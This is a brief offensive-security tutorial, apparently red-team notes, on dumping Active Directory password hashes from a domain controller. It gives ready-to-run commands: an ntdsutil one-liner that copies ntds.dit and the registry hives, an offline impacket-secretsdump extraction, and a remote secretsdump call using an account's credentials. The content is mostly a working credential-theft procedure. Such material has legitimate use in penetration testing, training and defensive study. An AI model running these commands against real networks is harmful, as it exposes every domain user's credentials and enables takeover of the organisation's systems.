Dumping Domain Controller Hashes Locally and Remotely

Dumping NTDS.dit with Active Directory users hashes

No Credentials

If you have no credentials, but you have access to the DC, it's possible to dump the ntds.dit using a lolbin ntdsutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:

We can then dump password hashes offline with impacket:

[email protected]~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

With Credentials

If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely via RPC protocol with impacket:

impacket-secretsdump -just-dc-ntlm offense/[email protected]